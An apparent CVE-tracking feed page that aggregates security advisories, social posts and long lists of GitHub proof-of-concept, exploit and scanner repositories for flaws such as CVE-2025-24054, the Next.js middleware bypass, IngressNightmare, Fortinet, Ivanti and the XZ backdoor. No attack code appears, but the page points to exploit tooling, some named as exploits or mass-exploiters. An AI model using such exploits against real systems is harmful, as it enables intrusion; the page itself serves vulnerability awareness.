https://beyondmachines.net/event_details/active-mail-remote-code-execution-flaw-actively-exploited-u-h-r-8-r/gD2P6Ple2L
updated 2025-04-18T14:15:17.677000
4 posts
3 repos
https://github.com/helidem/CVE-2025-24054-PoC
Windows – CVE-2025-24054: this NTLM exploit is being used to target businesses and governments https://www.it-connect.fr/windows-cve-2025-24054-cet-exploit-ntlm-est-utilise-pour-cibler-entreprises-et-gouvernements/ #ActuCybersécurité #Cybersécurité #Phishing #Windows #NTLM
##There is quite a bit of buzz related to CVE-2025-24054 which covers attackers causing victims to leak NTLM hashes if they open certain files or view certain directories. In short, this forces victims running Windows to make a connection to an attacker controlled SMB share.
Note: A patch was provided by Microsoft on March 11.
If you prevent SMB traffic from leaving your networks then you don't have to worry about this unless the attacker has already setup shop in your network. Like, patch anyway but, IMO, it would be a better use of your time to ensure that outbound SMB is blocked first. Don't forget to account for mobile devices that are off-network.
Reference:
Check Point - CVE-2025-24054, NTLM Exploit in the Wild
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
Man, what a week! 😅 Those supposedly "harmless" clicks... seriously, sometimes it's enough to make you wanna weep.
Sure, the big, flashy exploits grab the headlines. But honestly? More often than not, it's a simple dodgy config or a user clicking way too fast that really opens the door.
Working as a pentester, I see this play out constantly: those little slip-ups are frequently the most dangerous ones. It’s why you *definitely* need to keep CVE-2025-24054 on your radar and get it patched ASAP!
And folks, seriously – *never* blindly run random Python code someone just emails you out of the blue! (Yeah, we see you, potential state-sponsored actors 😉).
What about you? Got any war stories about these seemingly "small" attack vectors? Let's hear 'em! Share your experiences below. 👇
##Heads up, security folks!
There’s a fresh CVE out in the wild—CVE-2025-24054—and it’s not messing around.
This one abuses Windows .library-ms files to sneakily leak your NTLMv2 hashes. Just previewing a malicious file could trigger it—no clicks needed. Yep, that easy for attackers to get their foot in the door.
The kicker? It’s already being exploited in the wild, just days after Microsoft’s patch dropped in March. First targets were spotted in Poland and Romania, but we all know these things don’t stay local for long.
What to do:
• Patch now (if you haven’t already).
• Block suspicious SMB traffic.
• Rethink NTLM—disable it where you can.
Full breakdown from Check Point here:
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
#CyberSecurity #Infosec #Windows #NTLM #CVE202524054 #BlueTeam #PatchNow
##updated 2025-04-15T21:31:48
1 posts
Critical authentication flaw reported in Lantronix Xport
The Lantronix Xport devices contain a critical authentication bypass vulnerability (CVE-2025-2567, CVSS 9.8) affecting versions 6.5.0.7 through 7.0.0.3 that allows remote attackers to access the configuration interface without credentials, potentially enabling disruption of critical infrastructure and creating safety hazards in fuel operations.
**If you are using Lantronix Xport devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-flaw-reported-in-lantronix-xport-c-7-8-8-g/gD2P6Ple2L
updated 2025-04-15T18:39:27.967000
1 posts
Infinite loop DoS in Amazon dot IonDotnet.
https://aws.amazon.com/security/security-bulletins/AWS-2025-009/
sev:MED 5.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
##A vulnerability classified as critical was found in ZeroWdd/code-projects studentmanager 1.0. This vulnerability affects unknown code of the file /getTeacherList. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
updated 2025-04-15T18:31:58
1 posts
Lulz. Remember the brouhaha about the "vulnerability" in WinRAR for not preserving the Mark-of-the-Web when extracting files from downloaded archives? Well, guess what WinZIP does.
"CVE-2025-33028 - WinZip Mark-of-the-Web Bypass Vulnerability":
https://github.com/EnisAksu/Argonis/blob/main/CVEs/CVE-2025-33028%20%28WinZip%29/CVE-2025-33028.md
##updated 2025-04-11T15:39:52.920000
1 posts
Critical flaw reported in InstaWP Connect WordPress plugin
The InstaWP Connect WordPress plugin contains a critical Local File Inclusion vulnerability (CVE-2025-2636, CVSS 9.8) in versions up to 0.1.0.85 that allows unauthenticated attackers to execute arbitrary PHP files, potentially leading to complete website compromise. Administrators should update to version 0.1.0.86 or later.
**If you have installed InstaWP Connect WordPress plugin, update it NOW. The update is trivial, and it's much easier to update a plugin and sleep easy than to worry whether you can be hacked.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-flaw-reported-in-instawp-connect-wordpress-plugin-0-x-2-p-8/gD2P6Ple2L
updated 2025-04-11T15:39:52.920000
1 posts
Palo Alto updated this vulnerability yesterday.
CVE-2025-0120 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (moderate) https://security.paloaltonetworks.com/CVE-2025-0120 #PaloAlto #cybersecurity #infosec
##updated 2025-04-10T01:59:49
2 posts
4 repos
https://github.com/peiqiF4ck/WebFrameworkTools-5.1-main
https://github.com/verylazytech/CVE-2025-3248
Go hack more AI shit.
https://www.zscaler.com/blogs/security-research/cve-2025-3248-rce-vulnerability-langflow
##CVE-2025-3248: RCE vulnerability in Langflow – Source: securityboulevard.com https://ciso2ciso.com/cve-2025-3248-rce-vulnerability-in-langflow-source-securityboulevard-com/ #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #SecurityBoulevard
##updated 2025-04-08T18:34:49
4 posts
Glad we got this out of the way.
PC World: Windows 11’s crucial new ‘inetpub’ folder, created to patch CVE-2025-21204, is laughably easy to hack https://www.pcworld.com/article/2761626/windows-11s-crucial-new-inetpub-folder-is-laughably-easy-to-hack.html @pcworld #cybersecurity #infosec #Microsoft #Windows
##@GossiTheDog Are you sure the writeup for CVE-2025-21204 you linked is good? It seems superficially reasonable but looks very confusing on closer inspection, in a way that suggests it may be AI-generated.
But I'm not that confident in our assessment here, and will probably trust your judgement if you say it looks reasonable - we don't do too much Windows stuff
##My recent linking a CVE-2025-21204 PoC is in fact BS. Deeper inspection of the PoC demonstrated no connection between the code and C:\inetpub, and what's more, the "evidence" didn't show privilege escalation.
I had concerns this was LLM crap, and I should have trusted those instincts.
##I've written about how Microsoft's fix for a symlink vulnerability introduces another symlink vulnerability, where all users (including non-admins) can stop all future Windows OS security patches https://doublepulsar.com/microsofts-patch-for-cve-2025-21204-symlink-vulnerability-introduces-another-symlink-vulnerability-9ea085537741
##updated 2025-04-08T18:34:48
1 posts
2 repos
https://github.com/groshi215/CVE-2024-48887-Exploit
https://github.com/cybersecplayground/CVE-2024-48887-FortiSwitch-Exploit
CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.
Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet
##updated 2025-03-28T15:32:59
1 posts
81 repos
https://github.com/lediusa/CVE-2025-29927
https://github.com/jmbowes/NextSecureScan
https://github.com/Neoxs/nextjs-middleware-vuln-poc
https://github.com/goncalocsousa1/CVE-2025-29927
https://github.com/fahimalshihab/NextBypass
https://github.com/t3tra-dev/cve-2025-29927-demo
https://github.com/0x0Luk/0xMiddleware
https://github.com/pouriam23/Next.js-Middleware-Bypass-CVE-2025-29927-
https://github.com/Naveen-005/Next.Js-middleware-bypass-vulnerability-CVE-2025-29927
https://github.com/Oyst3r1ng/CVE-2025-29927
https://github.com/aydinnyunus/CVE-2025-29927
https://github.com/nocomp/CVE-2025-29927-scanner
https://github.com/furmak331/CVE-2025-29927
https://github.com/nyctophile0969/CVE-2025-29927
https://github.com/kuzushiki/CVE-2025-29927-test
https://github.com/m2hcz/m2hcz-Next.js-security-flaw-CVE-2025-29927---PoC-exploit
https://github.com/gotr00t0day/CVE-2025-29927
https://github.com/RoyCampos/CVE-2025-29927
https://github.com/sn1p3rt3s7/NextJS_CVE-2025-29927
https://github.com/pickovven/vulnerable-nextjs-14-CVE-2025-29927
https://github.com/kOaDT/poc-cve-2025-29927
https://github.com/lem0n817/CVE-2025-29927
https://github.com/yuzu-juice/CVE-2025-29927_demo
https://github.com/darklotuskdb/nextjs-CVE-2025-29927-hunter
https://github.com/enochgitgamefied/NextJS-CVE-2025-29927
https://github.com/iSee857/CVE-2025-29927
https://github.com/ayato-shitomi/WebLab_CVE-2025-29927
https://github.com/ticofookfook/poc-nextjs-CVE-2025-29927
https://github.com/ethanol1310/POC-CVE-2025-29927-
https://github.com/w2hcorp/CVE-2025-29927-PoC
https://github.com/nicknisi/next-attack
https://github.com/UNICORDev/exploit-CVE-2025-29927
https://github.com/c0dejump/CVE-2025-29927-check
https://github.com/AnonKryptiQuz/NextSploit
https://github.com/Knotsecurity/CVE-2025-29927-NextJs-Middleware-Simulation
https://github.com/aleongx/CVE-2025-29927
https://github.com/Slvignesh05/CVE-2025-29927
https://github.com/yugo-eliatrope/test-cve-2025-29927
https://github.com/azu/nextjs-cve-2025-29927-poc
https://github.com/ThemeHackers/CVE-2025-29972
https://github.com/Kamal-418/Vulnerable-Lab-NextJS-CVE-2025-29927
https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927
https://github.com/elshaheedy/CVE-2025-29927-Sigma-Rule
https://github.com/EQSTLab/CVE-2025-29927
https://github.com/alihussainzada/CVE-2025-29927-PoC
https://github.com/0xcucumbersalad/cve-2025-29927
https://github.com/alastair66/CVE-2025-29927
https://github.com/ferpalma21/Automated-Next.js-Security-Scanner-for-CVE-2025-29927
https://github.com/Heimd411/CVE-2025-29927-PoC
https://github.com/MuhammadWaseem29/CVE-2025-29927-POC
https://github.com/fourcube/nextjs-middleware-bypass-demo
https://github.com/dante01yoon/CVE-2025-29927
https://github.com/mhamzakhattak/CVE-2025-29927
https://github.com/Eve-SatOrU/POC-CVE-2025-29927
https://github.com/BilalGns/CVE-2025-29927
https://github.com/Gokul-Krishnan-V-R/cve-2025-29927
https://github.com/Ademking/CVE-2025-29927
https://github.com/0xPThree/next.js_cve-2025-29927
https://github.com/6mile/nextjs-CVE-2025-29927
https://github.com/pixilated730/NextJS-Exploit-
https://github.com/maronnjapan/claude-create-CVE-2025-29927
https://github.com/TheresAFewConors/CVE-2025-29927-Testing
https://github.com/websecnl/CVE-2025-29927-PoC-Exploit
https://github.com/Nekicj/CVE-2025-29927-exploit
https://github.com/arvion-agent/next-CVE-2025-29927
https://github.com/jeymo092/cve-2025-29927
https://github.com/Grand-Moomin/Vuln-Next.js-CVE-2025-29927
https://github.com/strobes-security/nextjs-vulnerable-app
https://github.com/serhalp/test-cve-2025-29927
https://github.com/YEONDG/nextjs-cve-2025-29927
https://github.com/l1uk/nextjs-middleware-exploit
https://github.com/Jull3Hax0r/next.js-exploit
https://github.com/0xWhoknows/CVE-2025-29927
https://github.com/Balajih4kr/cve-2025-29927
https://github.com/aleongx/CVE-2025-29927_Scanner
https://github.com/kh4sh3i/CVE-2025-29927
https://github.com/takumade/ghost-route
https://github.com/narasimhauppala/nextjs-middleware-bypass
https://github.com/ValGrace/middleware-auth-bypass
Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927) http://www.kitploit.com/2025/04/ghost-route-ghost-route-detects-if-next.html
##updated 2025-03-28T15:32:58
1 posts
ASUS releases fix for AMI bug that lets hackers brick servers
ASUS has released security updates to address CVE-2024-54085, a maximum severity flaw that could allow attackers to hijack and potentially brick...
🔗️ [Bleepingcomputer] https://link.is.it/ky8mNl
##updated 2025-03-25T15:10:16
1 posts
17 repos
https://github.com/Esonhugh/ingressNightmare-CVE-2025-1974-exps
https://github.com/yoshino-s/CVE-2025-1974
https://github.com/zulloper/CVE-2025-1974
https://github.com/hi-unc1e/CVE-2025-1974-poc
https://github.com/tuladhar/ingress-nightmare
https://github.com/yanmarques/CVE-2025-1974
https://github.com/gian2dchris/ingress-nightmare-poc
https://github.com/0xBingo/CVE-2025-1974
https://github.com/zwxxb/CVE-2025-1974
https://github.com/sandumjacob/IngressNightmare-POCs
https://github.com/m-q-t/ingressnightmare-detection-poc
https://github.com/hakaioffsec/IngressNightmare-PoC
https://github.com/lufeirider/IngressNightmare-PoC
https://github.com/Ar05un05kau05ndal/2025-1
https://github.com/dttuss/IngressNightmare-RCE-POC
https://github.com/Rubby2001/CVE-2025-1974-go
https://github.com/rjhaikal/POC-IngressNightmare-CVE-2025-1974
Fortinet: IngressNightmare: Understanding CVE-2025-1974 in Kubernetes Ingress-NGINX https://www.fortinet.com/blog/threat-research/ingressnightmare-understanding-cve-2025-1974-in-kubernetes-ingress-nginx @fortinet #cybersecurity #Infosec #Kubernetes
##updated 2025-03-11T18:32:12
1 posts
3 repos
https://github.com/demining/Bluetooth-Attacks-CVE-2025-27840
CVE-2025-27840: How a Tiny ESP32 Chip Could Crack Open Bitcoin Wallets Worldwide https://securityonline.info/cve-2025-27840-how-a-tiny-esp32-chip-could-crack-open-bitcoin-wallets-worldwide/
##updated 2025-03-10T23:15:35.073000
6 posts
Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.
##OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610
More:
The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby
##Rack Ruby vulnerability could reveal secrets to attackers (CVE-2025-27610) https://www.helpnetsecurity.com/2025/04/25/rack-ruby-vulnerability-could-reveal-secrets-to-attackers-cve-2025-27610/ #webapplicationsecurity #securityupdate #vulnerability #Don'tmiss #Hotstuff #OPSWAT #News #Ruby
##Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.
First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.
Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.
It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️
So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!
##updated 2025-03-07T03:31:33
1 posts
Updated #curl bug bounty stats, six years in:
520 reports
78 confirmed security vulnerabilities
104 "informative" reports, bugs that weren't vulnerabilities
11 marked as "AI slop"
The rest were just different kinds of not applicable. Some more crazy than others.
The latest confirmed curl vulnerability (CVE-2025-0725) was reported 90 days ago.
There are currently zero issues in our queue.
##updated 2025-03-04T16:15:40.487000
4 posts
Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.
##OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610
More:
The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby
##updated 2025-02-24T18:32:12
1 posts
7 repos
https://github.com/AiK1d/CVE-2022-42475-RCE-POC
https://github.com/bryanster/ioc-cve-2022-42475
https://github.com/scrt/cve-2022-42475
https://github.com/Mustafa1986/cve-2022-42475-Fortinet
https://github.com/0xhaggis/CVE-2022-42475
CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.
Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet
##updated 2025-02-14T20:15:34.350000
4 posts
Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.
##OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610
More:
The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby
##updated 2025-01-28T18:32:27
7 posts
10 repos
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit
https://github.com/44xo/CVE-2025-0282
https://github.com/Hexastrike/Ivanti-Connect-Secure-Logs-Parser
https://github.com/AdaniKamal/CVE-2025-0282
https://github.com/almanatra/CVE-2025-0282
https://github.com/watchtowrlabs/CVE-2025-0282
https://github.com/punitdarji/Ivanti-CVE-2025-0282
https://github.com/sfewer-r7/CVE-2025-0282
Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html #news #IT
##JPCERT/CC Eyes: DslogdRAT Malware Installed in Ivanti Connect Secure https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html
More:
The Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html @thehackernews #cybersecurity #Infosec #Ivanti #zeroday #malware
##DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks – Source:thehackernews.com https://ciso2ciso.com/dslogdrat-malware-deployed-via-ivanti-ics-zero-day-cve-2025-0282-in-japan-attacks-sourcethehackernews-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #TheHackerNews #DslogdRAT
##DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html
##updated 2025-01-27T21:31:51
1 posts
2 repos
Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.
Example:
CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.
CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7
##updated 2024-11-29T15:23:32.167000
1 posts
8 repos
https://github.com/cleverg0d/CVE-2024-21762-Checker
https://github.com/XiaomingX/cve-2024-21762-poc
https://github.com/h4x0r-dz/CVE-2024-21762
https://github.com/BishopFox/cve-2024-21762-check
https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check
https://github.com/rdoix/cve-2024-21762-checker
CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.
Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet
##updated 2024-10-02T21:30:35
1 posts
4 repos
https://github.com/adhikara13/CVE-2024-9441
https://github.com/p33d/CVE-2024-9441
Nice reports critical flaw in Linear eMerge E3
Critical vulnerability CVE-2024-9441 (CVSS 9.8) in Nice's Linear eMerge E3 access control system allows unauthenticated remote attackers to execute arbitrary OS commands through the login_id parameter in the forgot_password functionality. All versions through 1.00-07 affected and no patch is currently available.
**If you are using Nice Linear eMerge E3 access control system, be aware that it's vulnerable. Make sure it's isolated from the internet and accessible only from trusted networks, and reach out to the vendor for patch timing.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/nice-reports-critical-flaw-in-linear-emerge-e3-8-q-a-y-1/gD2P6Ple2L
##updated 2024-07-31T05:02:58
1 posts
Some nifty n-day vuln analysis from the team (Calum Hutton) this week: Citrix NetScaler Console CVE-2024-6235 allows an unauthenticated attacker to obtain an admin-level session ID from an internal API and use this to create other admin users on the system.
https://attackerkb.com/assessments/3bf5c123-41fa-47c5-9eb1-d139317061b8
##updated 2024-07-25T18:33:36
1 posts
57 repos
https://github.com/cybersecurityworks553/scanner-CVE-2020-5902
https://github.com/yasserjanah/CVE-2020-5902
https://github.com/ar0dd/CVE-2020-5902
https://github.com/jas502n/CVE-2020-5902
https://github.com/dunderhay/CVE-2020-5902
https://github.com/qiong-qi/CVE-2020-5902-POC
https://github.com/Shu1L/CVE-2020-5902-fofa-scan
https://github.com/GovindPalakkal/EvilRip
https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker
https://github.com/corelight/CVE-2020-5902-F5BigIP
https://github.com/Al1ex/CVE-2020-5902
https://github.com/0xAbdullah/CVE-2020-5902
https://github.com/qlkwej/poc-CVE-2020-5902
https://github.com/superzerosec/cve-2020-5902
https://github.com/wdlid/CVE-2020-5902-fix
https://github.com/Zinkuth/F5-BIG-IP-CVE-2020-5902
https://github.com/TheCyberViking/CVE-2020-5902-Vuln-Checker
https://github.com/west9b/F5-BIG-IP-POC
https://github.com/r0ttenbeef/cve-2020-5902
https://github.com/dnerzker/CVE-2020-5902
https://github.com/inho28/CVE-2020-5902-F5-BIGIP
https://github.com/jiansiting/CVE-2020-5902
https://github.com/ltvthang/CVE-2020-5903
https://github.com/34zY/APT-Backpack
https://github.com/d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter
https://github.com/rockmelodies/CVE-2020-5902-rce-gui
https://github.com/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner
https://github.com/jinnywc/CVE-2020-5902
https://github.com/yassineaboukir/CVE-2020-5902
https://github.com/PushpenderIndia/CVE-2020-5902-Scanner
https://github.com/lijiaxing1997/CVE-2020-5902-POC-EXP
https://github.com/deepsecurity-pe/GoF5-CVE-2020-5902
https://github.com/GoodiesHQ/F5-Patch
https://github.com/ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability
https://github.com/aqhmal/CVE-2020-5902-Scanner
https://github.com/murataydemir/CVE-2020-5902
https://github.com/renanhsilva/checkvulnCVE20205902
https://github.com/rwincey/CVE-2020-5902-NSE
https://github.com/ajdumanhug/CVE-2020-5902
https://github.com/haisenberg/CVE-2020-5902
https://github.com/momika233/cve-2020-5902
https://github.com/sv3nbeast/CVE-2020-5902_RCE
https://github.com/z3n70/CVE-2020-5902
https://github.com/flyopenair/CVE-2020-5902
https://github.com/zhzyker/CVE-2020-5902
https://github.com/k3nundrum/CVE-2020-5902
https://github.com/JSec1337/RCE-CVE-2020-5902
https://github.com/freeFV/CVE-2020-5902-fofa-scan
https://github.com/halencarjunior/f5scan
https://github.com/zhzyker/exphub
https://github.com/MrCl0wnLab/checker-CVE-2020-5902
https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
https://github.com/Any3ite/CVE-2020-5902-F5BIG
https://github.com/cristiano-corrado/f5_scanner
https://github.com/nsflabs/CVE-2020-5902
Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.
Example:
CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.
CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7
##updated 2024-07-11T12:30:56
1 posts
Schneider Electric reports critical flaw in Wiser Home Controller WHC-5918A
The Schneider Electric Wiser Home Controller WHC-5918A contains a critical security vulnerability (CVE-2024-6407, CVSS 9.8) allowing attackers to extract sensitive credentials by sending specially crafted messages. Schneider is recommending complete replacement of the discontinued device with their newer C-Bus Home Controller model as no security patches will be released.
**If you are using Schneider Electric Wiser Home Controller WHC-5918A devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/schneider-electric-reports-critical-flaw-in-wiser-home-controller-whc-5918a-0-k-c-4-0/gD2P6Ple2L
##updated 2024-04-04T04:45:33
1 posts
10 repos
https://github.com/delsploit/CVE-2023-27997
https://github.com/BishopFox/CVE-2023-27997-check
https://github.com/rio128128/CVE-2023-27997-POC
https://github.com/TechinsightsPro/ShodanFortiOS
https://github.com/puckiestyle/cve-2023-27997
https://github.com/lexfo/xortigate-cve-2023-27997
https://github.com/onurkerembozkurt/fgt-cve-2023-27997-exploit
https://github.com/imbas007/CVE-2023-27997-Check
CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.
Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet
##updated 2024-03-29T18:30:50
1 posts
62 repos
https://github.com/badsectorlabs/ludus_xz_backdoor
https://github.com/been22426/CVE-2024-3094
https://github.com/emirkmo/xz-backdoor-github
https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer
https://github.com/r0binak/xzk8s
https://github.com/neuralinhibitor/xzwhy
https://github.com/jfrog/cve-2024-3094-tools
https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check
https://github.com/mightysai1997/CVE-2024-3094-info
https://github.com/0xlane/xz-cve-2024-3094
https://github.com/bioless/xz_cve-2024-3094_detection
https://github.com/iheb2b/CVE-2024-3094-Checker
https://github.com/harekrishnarai/xz-utils-vuln-checker
https://github.com/Horizon-Software-Development/CVE-2024-3094
https://github.com/crfearnworks/ansible-CVE-2024-3094
https://github.com/isuruwa/CVE-2024-3094
https://github.com/hackingetico21/revisaxzutils
https://github.com/przemoc/xz-backdoor-links
https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector
https://github.com/byinarie/CVE-2024-3094-info
https://github.com/robertdebock/ansible-playbook-cve-2024-3094
https://github.com/dah4k/CVE-2024-3094
https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker
https://github.com/ScrimForever/CVE-2024-3094
https://github.com/weltregie/liblzma-scan
https://github.com/wgetnz/CVE-2024-3094-check
https://github.com/robertdfrench/ifuncd-up
https://github.com/FabioBaroni/CVE-2024-3094-checker
https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094
https://github.com/buluma/ansible-role-cve_2024_3094
https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container
https://github.com/amlweems/xzbot
https://github.com/lockness-Ko/xz-vulnerable-honeypot
https://github.com/ackemed/detectar_cve-2024-3094
https://github.com/brinhosa/CVE-2024-3094-One-Liner
https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094
https://github.com/gustavorobertux/CVE-2024-3094
https://github.com/felipecosta09/cve-2024-3094
https://github.com/robertdebock/ansible-role-cve_2024_3094
https://github.com/reuteras/CVE-2024-3094
https://github.com/Juul/xz-backdoor-scan
https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check
https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-
https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits
https://github.com/AndreaCicca/Sicurezza-Informatica-Presentazione
https://github.com/pentestfunctions/CVE-2024-3094
https://github.com/XiaomingX/cve-2024-3094-xz-backdoor-exploit
https://github.com/bsekercioglu/cve2024-3094-Checker
https://github.com/Yuma-Tsushima07/CVE-2024-3094
https://github.com/shefirot/CVE-2024-3094
https://github.com/Fractal-Tess/CVE-2024-3094
https://github.com/Simplifi-ED/CVE-2024-3094-patcher
https://github.com/ashwani95/CVE-2024-3094
https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script
https://github.com/hazemkya/CVE-2024-3094-checker
https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker
https://github.com/DANO-AMP/CVE-2024-3094
https://github.com/mightysai1997/CVE-2024-3094
https://github.com/mesutgungor/xz-backdoor-vulnerability
https://github.com/teyhouse/CVE-2024-3094
Wolves in the Repository: A Software Engineering Analysis of the XZ Utils Supply Chain Attack
Piotr Przymus (Nicolaus Copernicus University in Torun, Poland), Thomas Durieux (TU Delft & Endor Labs, The Netherlands)
https://arxiv.org/abs/2504.17473 https://arxiv.org/pdf/2504.17473 https://arxiv.org/html/2504.17473
arXiv:2504.17473v1 Announce Type: new
Abstract: The digital economy runs on Open Source Software (OSS), with an estimated 90% of modern applications containing open-source components. While this widespread adoption has revolutionized software development, it has also created critical security vulnerabilities, particularly in essential but under-resourced projects. This paper examines a sophisticated attack on the XZ Utils project (CVE-2024-3094), where attackers exploited not just code, but the entire open-source development process to inject a backdoor into a fundamental Linux compression library. Our analysis reveals a new breed of supply chain attack that manipulates software engineering practices themselves -- from community management to CI/CD configurations -- to establish legitimacy and maintain long-term control. Through a comprehensive examination of GitHub events and development artifacts, we reconstruct the attack timeline and analyze the evolution of attacker tactics. Our findings demonstrate how attackers leveraged seemingly beneficial contributions to project infrastructure and maintenance to bypass traditional security measures. This work extends beyond traditional security analysis by examining how software engineering practices themselves can be weaponized, offering insights for protecting the open-source ecosystem.
##updated 2024-01-19T20:49:34
1 posts
49 repos
https://github.com/devenes/text4shell-cve-2022-42889
https://github.com/SeanWrightSec/CVE-2022-42889-PoC
https://github.com/adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889
https://github.com/MendDemo-josh/cve-2022-42889-text4shell
https://github.com/Sic4rio/CVE-2022-42889
https://github.com/sunnyvale-it/CVE-2022-42889-PoC
https://github.com/HKirito/CVE-2022-33980
